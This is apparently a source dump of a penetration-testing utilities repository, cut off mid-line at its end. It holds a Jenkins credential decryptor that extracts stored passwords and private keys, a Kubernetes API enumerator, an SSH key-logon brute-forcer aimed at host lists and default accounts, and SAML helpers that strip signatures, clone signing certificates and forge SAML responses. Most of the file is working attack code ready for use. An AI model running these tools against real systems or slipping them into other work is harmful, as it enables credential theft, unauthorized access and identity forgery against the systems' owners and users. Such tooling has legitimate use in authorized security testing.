54 | def decryptOldPassword(secret, p):
55 |     # Copying the old code, I have not verified if it works
56 |     o = AES.new(secret, AES.MODE_ECB)
57 |     x = o.decrypt(p)
58 |     assert MAGIC in x
59 |     return re.findall(b'(.*)' + MAGIC, x)[0]
60 | 
61 | 
62 | def get_hudson_secret(master_key_file, hudson_key_file):
63 |     master_key = open(master_key_file, 'rb').read()
64 |     hudson_secret_key = open(hudson_key_file, 'rb').read()
65 |     hashed_master_key = sha256(master_key).digest()[:16]
66 |     o = AES.new(hashed_master_key, AES.MODE_ECB)
67 |     secret = o.decrypt(hudson_secret_key)
68 | 
69 |     #secret = secret[:-16]
70 |     secret = secret[:16]
71 |     return secret
72 | 
73 | 
74 | 
75 | def main():
76 |     if len(sys.argv) != 4:
77 |         usage()
78 | 
79 |     secret = get_hudson_secret(sys.argv[1], sys.argv[2])
80 |     credentials = open(sys.argv[3]).read()
81 |     passwords = re.findall(r'<(?:password|privateKey|bindPassword)>\{?(.*?)\}?</', credentials)
82 | 
83 |     # You can find the password format at https://github.com/jenkinsci/jenkins/blob/master/core/src/main/java/hudson/util/Secret.java#L167-L216
84 | 
85 |     for password in passwords:
86 |         print('Found a credential and attempting decryption...')
87 |         #p = base64.decodestring(bytes(password, 'utf-8'))
88 |         p = base64.b64decode(bytes(password, 'utf-8'))
89 | 
90 |         # Get payload version
91 |         payload_version = p[0]
92 |         if payload_version == 1:
93 |             print(decryptNewPassword(secret, p))
94 |         else: # Assuming we don't have a V2 payload, seeing as current crypto isn't horrible that's a fair assumption
95 |             print(decryptOldPassword(secret,p))
96 | 
97 | if __name__ == '__main__':
98 |     main()
99 | 
--------------------------------------------------------------------------------
/utilities/kubernetes_api_enumerator.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | import json
3 | import queue
4 | import sys
5 | import requests
6 | import argparse
7 | import logging
8 | from datetime import datetime
9 | from logging import Logger
10 | 
11 | 
12 | requests.packages.urllib3.disable_warnings()
13 | 
14 | def check_ipython() -> bool:
15 |     '''Returns True if script is running in interactive iPython shell'''
16 |     try:
17 |         get_ipython()
18 |         return True
19 |     except NameError:
20 |         return False
21 | 
22 | 
23 | class MyParser(argparse.ArgumentParser):
24 |     '''Custom argument parser'''
25 |     def error(self, message: str):
26 |         sys.stderr.write('error: %s\n' % message)
27 |         self.print_help()
28 |         sys.exit(2)
29 | 
30 | 
31 | def create_logger(loglevel: str, name: str) -> Logger:
32 |     '''Create a custom logger instance'''
33 |     logger = logging.getLogger(name)
34 |     logger.setLevel(loglevel)
35 |     handler = logging.StreamHandler(sys.stderr)
36 |     formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
37 |     handler.setFormatter(formatter)
38 |     logger.addHandler(handler)
39 | 
40 |     return logger
41 | 
42 | 
43 | class APIEnumerator:
44 | 
45 |     def __init__(self, apiserver, logger=Logger('APIEnumerator'), clientcert=None, clientkey=None, token=None, enumpaths=['/apis', '/api'], apiextract=True):
46 |         self.apiserver = apiserver
47 |         self.logger = logger
48 |         self.session = requests.Session()
49 |         self.session.verify = False
50 |         self.enumpaths = enumpaths
51 |         self.output = {}
52 |         self.queue = queue.SimpleQueue()
53 |         self.apiextract = apiextract
54 |         if clientcert and clientkey:
55 |             self.clientcert = clientcert
56 |             self.clientkey = clientkey
57 |             self.session.cert = (clientcert, clientkey)
58 |         elif token:
59 |             self.token = token
60 |             self.session.headers = {'Authorization': 'Bearer {}'.format(token)}
61 |         else:
62 |             self.logger.info('No authentication')
63 |             raise Exception('No authentication method configured')
64 | 
65 | 
66 |     def _response_parser(self, response, parent):
67 |         if response.get('kind') == 'APIGroupList':
68 |             for group in response['groups']:
69 |                 for version in group['versions']:
70 |                     self.queue.put('{}/{}'.format(parent, version['groupVersion']).replace('//', '/'))
71 |         elif response.get('kind') == 'APIResourceList':
72 |             for resource in response['resources']:
73 |                 self.queue.put('{}/{}'.format(parent, resource['name']).replace('//', '/'))
74 |         elif response.get('kind') == 'APIVersions':
75 |             for version in response['versions']:
76 |                 self.queue.put('{}/{}'.format(parent, version).replace('//', '/'))
77 | 
78 | 
79 |     def _try_openapi_enum(self):
80 |         r = self.session.get('https://{}/openapi/v2'.format(self.apiserver))
81 |         if r.status_code == 200 and r.headers.get('Content-Type') == 'application/json' and self.apiextract:
82 |             apidef = json.loads(r.content)
83 |             if 'paths' in apidef:
84 |                 self.logger.info('Path information extracted from API def')
85 |                 for key in apidef['paths']:
86 |                     # remove paths that require parameters ({value}) and ones that will never finish (/watch/)
87 |                     if not '{' in key and not '/watch/' in key:
88 |                         self.queue.put(key)
89 |         else:
90 |             for path in self.enumpaths:
91 |                 self.queue.put(path)
92 | 
93 | 
94 |     def enum(self):
95 |         self._try_openapi_enum()
96 |         while not self.queue.empty():
97 |             path = self.queue.get()
98 |             self.logger.info('{}{}'.format(self.apiserver, path))
99 |             r = self.session.get('https://{}{}'.format(self.apiserver, path))
100 |             if r.headers.get('Content-Type') == 'application/json':
101 |                 self.output[path] = json.loads(r.content)
102 |                 if r.status_code == 200:
103 |                     self._response_parser(json.loads(r.content), path)
104 | 
105 | 
106 | def command_line():
107 |     parser = MyParser()
108 |     input_arg_group = parser.add_argument_group('General')
109 |     input_arg_group.add_argument('-server', type=str, required=True, help='Kubernetes API Server domain name. Include port if not 443')
110 |     input_arg_group.add_argument('-noapiextract', action='store_false', help='Disable extraction of paths from openapiv2 endpoint')
111 | 
112 |     output_arg_group = parser.add_argument_group('Output')
113 |     output_arg_group.add_argument('-output', type=str, default=None, help='Output filename')
114 |     output_arg_group.add_argument('-loglevel', choices=['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'], default='WARNING', help='Set logging level')
115 | 
116 |     auth_arg_group = parser.add_argument_group('Authentication')
117 |     mgroup_schema = auth_arg_group.add_mutually_exclusive_group()
118 |     mgroup_schema.add_argument('-clientcert', type=str, default=None, help='Client certificate (PEM) file')
119 |     mgroup_schema.add_argument('-token', type=str, default=None, help='Authorization token')
120 |     auth_arg_group.add_argument('-clientkey', type=str, default=None, help='Key file (PRIVATE KEY) associated with client certificate')
121 | 
122 |     args = parser.parse_args()
123 | 
124 |     logger = create_logger(args.loglevel, 'Kubernetes API Enumerator')
125 | 
126 |     if (not args.clientcert) and (not args.token):
127 |         print('Provide at least one authentication method (token or client certificate and key)')
128 |         sys.exit(1)
129 | 
130 |     if args.clientcert and not args.clientkey:
131 |         print('Provide a key file to use with the client certificate "{}"'.format(args.clientcert))
132 |         sys.exit(1)
133 | 
134 | 
135 |     outputfile = args.output if args.output else '{}_{}_Kubernetes_API.json'.format(datetime.now().strftime('%Y%m%d%H%M%S'), args.server.replace(':', '_'))
136 | 
137 |     enumerator = APIEnumerator(args.server, logger=logger, clientcert=args.clientcert, clientkey=args.clientkey, token=args.token, apiextract=args.noapiextract)
138 |     enumerator.enum()
139 |     open(outputfile, 'w').write(json.dumps(enumerator.output, indent=4))
140 |     logger.warning('Wrote output file {}'.format(outputfile))
141 | 
142 | 
143 | 
144 | if __name__ == "__main__":
145 |     # execute only if run as a script, helpful if script needs to be debugged
146 | 
147 |     if not check_ipython():
148 |         command_line()
--------------------------------------------------------------------------------
/utilities/ssh_bruteforcer.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | 
3 | import paramiko
4 | import glob
5 | import time
6 | import sys
7 | import argparse
8 | 
9 | 
10 | 
11 | class MyParser(argparse.ArgumentParser):
12 |     def error(self, message):
13 |         sys.stderr.write('error: %s\n' % message)
14 |         self.print_help()
15 |         sys.exit(2)
16 | 
17 | 
18 | 
19 | def try_connect(host, username, key_file, timeout=1, port=22) -> str:
20 |     client = paramiko.client.SSHClient()
21 |     client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
22 |     connect_params = {'port': port, 'username': username, 'timeout': timeout, 'banner_timeout': timeout}
23 |     #kfd = open(key_file).read()
24 |     #if kfd.startswith('-----BEGIN OPENSSH') or kfd.startswith('-----BEGIN RSA') or kfd.startswith('-----BEGIN EC'):
25 |     try:
26 |         connect_params['pkey'] = paramiko.RSAKey.from_path(key_file)
27 |     except paramiko.SSHException as e:
28 |         if 'not a valid' in str(e):
29 |             return 'BAD_KEY'
30 |         elif 'Invalid key curve identifier' in str(e):
31 |             return 'BAD_KEY'
32 |         else:
33 |             raise paramiko.SSHException(e)
34 |     except ValueError as e:
35 |         if 'Could not deserialize key data.' in str(e):
36 |             return 'PASSWORD_REQUIRED'
37 |         else:
38 |             raise ValueError(e)
39 |     except:
40 |         return 'BAD_KEY'
41 |     #else:
42 |     #    connect_params['key_filename'] = key_file
43 | 
44 |     try:
45 |         client.connect(host, **connect_params) # banner_timeout=None, auth_timeout=None, channel_timeout=None
46 |     except ValueError as e:
47 |         client.close()
48 |         if 'q must be exactly 160, 224, or 256 bits long' in str(e):
49 |             return 'BAD_KEY'
50 |         else:
51 |             raise ValueError(e)
52 |     except paramiko.AuthenticationException:
53 |         client.close()
54 |         return 'FAILED'
55 |     except paramiko.PasswordRequiredException as e:
56 |         client.close()
57 |         if 'Private key file is encrypted' in str(e):
58 |             return 'PASSWORD_REQUIRED'
59 |         else:
60 |             raise paramiko.PasswordRequiredException(e)
61 |     except OSError as e:
62 |         client.close()
63 |         if 'Host is down' in str(e):
64 |             return 'HOST_DOWN'
65 |         elif 'Unable to connect to port 22' in str(e):
66 |             return 'NO_SSH'
67 |         else:
68 |             raise OSError(e)
69 | 
70 |     except Exception as e:
71 |         client.close()
72 |         if 'q must be exactly 160, 224, or 256 bits long' in str(e):
73 |             return 'BAD_KEY'
74 |         else:
75 |             raise Exception(e)
76 |     client.close()
77 |     return 'SUCCESS'
78 | 
79 | 
80 | 
81 | if __name__ == "__main__":
82 |     parser = MyParser()
83 |     #parser.epilog = 'Text to include after help output'
84 |     parser.description = 'SSH key logon brute forcer'
85 |     parser.add_argument('-t', '--targets', type=str, required=True, help='File with newline separated SSH hosts to target for logons, use host:port for non default SSH port. REQUIRED.')
86 |     parser.add_argument('-k', '--keyglob', type=str, required=True, help='Glob pattern to match keyfiles to use for logon, e.g. /tmp/*.pem. REQUIRED')
87 |     parser.add_argument('-o', '--output', type=str, required=True, help='Filename for output. REQUIRED')
88 |     parser.add_argument('-u', '--users', type=str, help='File with usernames to use for logons, otherwise a default set of usernames will be attempted')
89 |     parser.add_argument('-x', '--timeout', type=int, default=5, help='Connection timeout in seconds')
90 |     parser.add_argument('-v', '--verbose', action='store_true', default=False, help='Verbose output')
91 |     args = parser.parse_args()
92 | 
93 | 
94 |     hostfile = args.targets
95 |     hosts = [a for a in open(hostfile).read().split('\n') if a]
96 |     if args.users:
97 |         userfile = args.users
98 |         users = [a for a in open(userfile).read().split('\n') if a]
99 |     else:
100 |         users = ['ec2-user', 'ubuntu', 'root', 'admin', 'user']
101 | 
102 |     timeout = args.timeout
103 |     verbose = args.verbose
104 |     outputfile = args.output
105 |     keypattern = args.keyglob
106 | 
107 | 
108 |     default_port=22
109 |     sleep = 0.5 # TODO: expose
110 | 
111 | 
112 |     keys = glob.glob(keypattern)
113 | 
114 |     skip_keys = []
115 |     skip_hosts = []
116 |     success_count = 0
117 | 
118 |     oh = open(outputfile, 'w')
119 |     for key in [a for a in keys]:
120 |         usable_key = True
121 |         for user in users:
122 |             if usable_key:
123 |                 for host in [a for a in hosts if a not in skip_hosts]:
124 |                     if usable_key:
125 |                         if verbose:
126 |                             print(f'Trying {host};{user};{key}')
127 |                         hnp = host.split(':')
128 |                         if len(hnp) > 1:
129 |                             host = hnp[0]
130 |                             port = int(hnp[1])
131 |                         else:
132 |                             port = default_port
133 |                         try:
134 |                             result = try_connect(host, user, key, port=port, timeout=timeout)
135 |                             if result == 'PASSWORD_REQUIRED':
136 |                                 if verbose:
137 |                                     print(f'Key {key} requires a password')
138 |                                 usable_key = False
139 |                             if result == 'BAD_KEY':
140 |                                 if verbose:
141 |                                     print(f'Key {key} is bad')
142 |                                 usable_key = False
143 |                             if result == 'HOST_DOWN':
144 |                                 if verbose:
145 |                                     print(f'Host {host} is down')
146 |                                 skip_hosts.append(host)
147 |                             if result == 'NO_SSH':
148 |                                 if verbose:
149 |                                     print(f'Host {host} is not running ssh on port {port}')
150 |                                 skip_hosts.append(host)
151 |                             if result == 'SUCCESS':
152 |                                 success_count += 1
153 |                                 if verbose:
154 |                                     print(f'SUCCESS:{host};{user};{key}')
155 |                                 oh.write(f'SUCCESS:{host};{user};{key}\n')
156 |                                 oh.flush()
157 | 
158 |                         except Exception as e:
159 |                             if verbose:
160 |                                 print(f'EXCEPTION:{host};{user};{key};{str(e)}')
161 |                             oh.write(f'EXCEPTION:{host};{user};{key};{str(e)}\n')
162 |                         time.sleep(sleep)
163 | 
164 |     oh.close()
165 | 
166 |     print(f'Completed. Found {success_count} successful credential pairs. Output written to {outputfile}')
167 | 
--------------------------------------------------------------------------------
/utilities/ssh_cert_utilities.py:
--------------------------------------------------------------------------------
1 | from pyasn1.type import univ
2 | from pyasn1.codec.der import encoder as der_encoder, decoder as der_decoder
3 | from OpenSSL import crypto
4 | import sys
5 | import struct
6 | import base64
7 | 
8 | 
9 | # modified from the below and updated to support python 2 and 3
10 | #https://gist.github.com/thwarted/1024558
11 | def ssh_pub_to_pem(key):
12 | 
13 |     keydata = base64.b64decode(key.split(' ')[1])
14 | 
15 |     if sys.version_info.major == 2:
16 |         bc = lambda x: ord(x)
17 |     else:
18 |         bc = lambda x: x
19 | 
20 |     parts = []
21 |     while keydata:
22 |         # read the length of the data
23 |         dlen = struct.unpack('>I', keydata[:4])[0]
24 | 
25 |         # read in bytes
26 |         data, keydata = keydata[4:dlen+4], keydata[4+dlen:]
27 | 
28 |         parts.append(data)
29 | 
30 |     numberfy = lambda x : sum([a[0] << a[1] for a in zip([bc(a) for a in x], [a*8 for a in range(0, len(x))[::-1]] )])
31 | 
32 |     # get the numeric value of the bytes in big endian order
33 |     e_val = numberfy(parts[1])
34 |     n_val = numberfy(parts[2])
35 | 
36 |     bitstring = univ.Sequence()
37 |     bitstring.setComponentByPosition(0, univ.Integer(n_val))
38 |     bitstring.setComponentByPosition(1, univ.Integer(e_val))
39 | 
40 |     bitstring1 = der_encoder.encode(bitstring)
41 | 
42 |     # turn into a big binary string
43 |     bitstring2 = ''.join([format(bc(x), '08b') for x in bitstring1])
44 | 
45 | 
46 |     bitstring3 = univ.BitString("'%s'B" % bitstring2)
47 | 
48 |     pubkeyid = univ.Sequence()
49 |     pubkeyid.setComponentByPosition(0, univ.ObjectIdentifier('1.2.840.113549.1.1.1')) # == OID for rsaEncryption
50 |     pubkeyid.setComponentByPosition(1, univ.Null(''))
51 | 
52 |     pubkey_seq = univ.Sequence()
53 |     pubkey_seq.setComponentByPosition(0, pubkeyid)
54 |     pubkey_seq.setComponentByPosition(1, bitstring3)
55 | 
56 |     encoded = base64.b64encode(der_encoder.encode(pubkey_seq)).decode('utf8')
57 |     return "-----BEGIN PUBLIC KEY-----\n" + '\n'.join([encoded[a:a+64] for a in range(0, len(encoded), 64)]) + '\n-----END PUBLIC KEY-----\n'
58 | 
59 | 
60 | 
61 | def match_ssh_keypair(id_rsa_priv_pem, id_rsa_pub_ssh):
62 |     '''Return True if provided private key in PEM format and public key in ssh-rsa format match'''
63 |     if not isinstance(id_rsa_pub_ssh, str) or not id_rsa_pub_ssh.startswith('ssh-rsa '):
64 |         return 'Provide public key in ssh public key string format'
65 |     if not isinstance(id_rsa_priv_pem, str) or not len([a for a in id_rsa_priv_pem.split('\n') if 'PRIVATE KEY' in a]) == 2:
66 |         return 'Provide private key in RSA PEM format'
67 | 
68 |     private = crypto.load_privatekey(crypto.FILETYPE_PEM, id_rsa_priv_pem)
69 |     #public_base = base64.b64decode(id_rsa_pub_ssh.split(' ')[1])
70 | 
71 |     return ''.join([a for a in crypto.dump_publickey(crypto.FILETYPE_PEM, private).decode('utf-8').split('\n') if a and '--' not in a]) == ''.join([ a for a in ssh_pub_to_pem(id_rsa_pub_ssh).split('\n') if '--' not in a])
72 | 
73 | 
74 | 
75 | def pem_key_details(key):
76 |     '''Given a key in PEM format, provides details about the key'''
77 |     mk = crypto.load_publickey(crypto.FILETYPE_PEM, key)
78 |     ck = mk.to_cryptography_key()
79 |     return {'bits' : mk.bits(), 'e' : ck.public_numbers().e, 'n' : ck.public_numbers().n, 'type' : {getattr(crypto, a): a.replace('TYPE_', '') for a in dir(crypto) if a.startswith('TYPE_')}[mk.type()] }
80 | 
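# Example usage sketch (an addition; assumes an RSA keypair on disk whose private half is
# in PEM format, e.g. generated with: ssh-keygen -t rsa -m PEM -f ./id_rsa):
#
#   pub_ssh = open('id_rsa.pub').read()
#   priv_pem = open('id_rsa').read()
#   print(ssh_pub_to_pem(pub_ssh))                    # ssh-rsa line -> PEM public key
#   print(match_ssh_keypair(priv_pem, pub_ssh))       # True if the halves correspond
#   print(pem_key_details(ssh_pub_to_pem(pub_ssh)))   # {'bits': ..., 'e': ..., 'n': ..., 'type': 'RSA'}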
--------------------------------------------------------------------------------
/utilities/sso-helpers.py:
--------------------------------------------------------------------------------
1 | import base64
2 | from urllib.parse import unquote, quote
3 | from lxml import etree
4 | from lxml.etree import tostring
5 | from signxml import XMLSigner, XMLVerifier
6 | import signxml
7 | from OpenSSL import crypto
8 | from cryptography.hazmat.primitives import serialization
9 | import sys
10 | 
11 | 
12 | placeholder = '<removed/>' # well-formed XML element swapped in where the Signature node is stripped
13 | 
14 | def web64_encode(val):
15 |     return base64.urlsafe_b64encode(val).replace(b'=', b'')
16 | 
17 | 
18 | def web64_decode(val):
19 |     return base64.urlsafe_b64decode(val + '=' * ((4 - (len(val) % 4)) % 4))
20 | 
21 | 
22 | def decode_saml(raw_saml):
23 |     return base64.b64decode(unquote(raw_saml))
24 | 
25 | def encode_saml(xml_text):
26 |     return quote(base64.b64encode(xml_text))
27 | 
28 | 
29 | def get_saml_cert(saml):
30 |     return etree.ElementTree(etree.fromstring(saml)).xpath("//*[local-name()='X509Certificate']")[0].text
31 | 
32 | def get_saml_cert_raw(raw_saml):
33 |     return get_saml_cert(decode_saml(raw_saml))
34 | 
35 | 
36 | def get_signed_ref(saml):
37 |     return etree.ElementTree(etree.fromstring(saml)).xpath("//*[local-name()='Reference']")[0].get('URI').lstrip('#')
38 | 
39 | 
40 | 
41 | def get_signed_ref_raw(raw_saml):
42 |     return get_signed_ref(decode_saml(raw_saml))
43 | 
44 | 
45 | 
46 | def string_to_xml(xml_string):
47 |     return etree.ElementTree(etree.fromstring(xml_string))
48 | 
49 | 
50 | def verify_saml(saml):
51 |     '''Returns signed xml, exception if signature invalid'''
52 |     cert = get_saml_cert(saml)
53 |     return XMLVerifier().verify(saml, x509_cert=cert).signed_data
54 | 
55 | 
56 | def verify_saml_raw(raw_saml):
57 |     '''Returns signed xml, exception if signature invalid'''
58 |     cert = get_saml_cert_raw(raw_saml)
59 |     return XMLVerifier().verify(base64.b64decode(unquote(raw_saml)), x509_cert=cert).signed_data
60 | 
61 | 
62 | def sign_saml(xml_root, key, cert, reference, mode='normal', c14n='http://www.w3.org/2001/10/xml-exc-c14n#'):
63 |     if mode == 'microsoft':
64 |         return tostring(XMLSigner(method=signxml.methods.enveloped, c14n_algorithm=c14n, namespaces={None:'http://www.w3.org/2000/09/xmldsig#'}).sign(xml_root, key=key, cert=cert, reference_uri=reference) )
65 |     else:
66 |         return tostring(XMLSigner(method=signxml.methods.enveloped, c14n_algorithm=c14n).sign(xml_root, key=key, cert=cert, reference_uri=reference) )
67 | 
68 | 
69 | def strip_signature(raw_saml, placeholder=placeholder):
70 |     x = string_to_xml(decode_saml(raw_saml))
71 |     n = x.xpath(".//*[local-name()='Signature']")[0]
72 |     p = n.getparent()
73 |     p.replace(n, etree.fromstring(placeholder))
74 |     return tostring(x)
75 | 
76 | 
77 | 
78 | 
79 | def copy_cert(saml_cert):
80 |     x509 = crypto.load_certificate(crypto.FILETYPE_ASN1, base64.b64decode(saml_cert))
81 | 
82 |     # Creating key
83 |     k = crypto.PKey()
84 |     k.generate_key(crypto.TYPE_RSA, ((x509.get_pubkey()).bits()))
85 |     cert = crypto.X509()
86 | 
87 |     # Setting cert details from the original certificate
88 |     cert.set_version(x509.get_version())
89 |     cert.set_serial_number(x509.get_serial_number())
90 |     cert.set_subject(x509.get_subject())
91 |     cert.set_issuer(x509.get_issuer())
92 |     cert.set_notBefore(x509.get_notBefore())
93 |     cert.set_notAfter(x509.get_notAfter())
94 |     cert.set_pubkey(k)
95 |     key1 = k.to_cryptography_key()
96 | 
97 |     # add extensions
98 |     cert.add_extensions([x509.get_extension(a) for a in range(0, x509.get_extension_count())])
99 | 
100 |     sig = x509.get_signature_algorithm().decode('ascii')
101 |     if 'WithRSAEncryption' not in sig:
102 |         raise Exception('Error: RSA not used to sign cert --- what??. Signature algorithm: %s' %(sig))
103 |     cert.sign(k, sig.replace('WithRSAEncryption', ''))
104 | 
105 |     # Private key in traditional RSA PEM format - for SAML Raider import
106 |     trsa = key1.private_bytes(encoding=serialization.Encoding.PEM, format=serialization.PrivateFormat.TraditionalOpenSSL, encryption_algorithm=serialization.NoEncryption())
107 | 
108 |     # PFX file format
109 |     pfx = crypto.PKCS12()
110 |     pfx.set_privatekey(k)
111 |     pfx.set_certificate(cert)
112 |     pfxdata = pfx.export()
113 |     pfxdata_pwd = pfx.export(passphrase=b'password') # for burp
114 | 
115 |     return {
116 |         'cert' : crypto.dump_certificate(crypto.FILETYPE_PEM, cert).decode('utf-8'),
117 |         'key' : crypto.dump_privatekey(crypto.FILETYPE_PEM, k).decode('utf-8'),
118 |         'pub' : crypto.dump_publickey(crypto.FILETYPE_PEM, k).decode('utf-8'),
119 |         'asn1_der_cert' : crypto.dump_certificate(crypto.FILETYPE_ASN1, cert),
120 |         'asn1_der_key' : crypto.dump_privatekey(crypto.FILETYPE_ASN1, k),
121 |         'asn1_der_pub' : crypto.dump_publickey(crypto.FILETYPE_ASN1, k),
122 |         'trad_rsa' : trsa,
123 |         'pfx' : pfxdata,
124 |         'pfx_password' : pfxdata_pwd,
125 |         'socat' : crypto.dump_privatekey(crypto.FILETYPE_PEM, k).decode('utf-8')+crypto.dump_certificate(crypto.FILETYPE_PEM, cert).decode('utf-8'),
126 |         'crypto' : crypto
127 |     }
128 | 
129 | 
130 | 
131 | # key is private key in PEM format with file headers
132 | # cert is in PEM format with file headers
133 | def forge_saml_response(raw_saml, key=None, cert=None):
134 |     try:
135 |         verify_saml_raw(raw_saml)
136 |     except:
137 |         print('Input SAML is not properly signed, but maybe you edited it?')
138 |     real_cert = get_saml_cert_raw(raw_saml)
139 |     if not key or not cert:
140 |         fake_cert = copy_cert(real_cert)
141 |         key = fake_cert['key']
142 |         cert = fake_cert['cert']
143 |     ref = get_signed_ref_raw(raw_saml)
144 |     base = strip_signature(raw_saml)
145 |     base_xml = string_to_xml(base)
146 |     mode = 'normal'
147 |     if '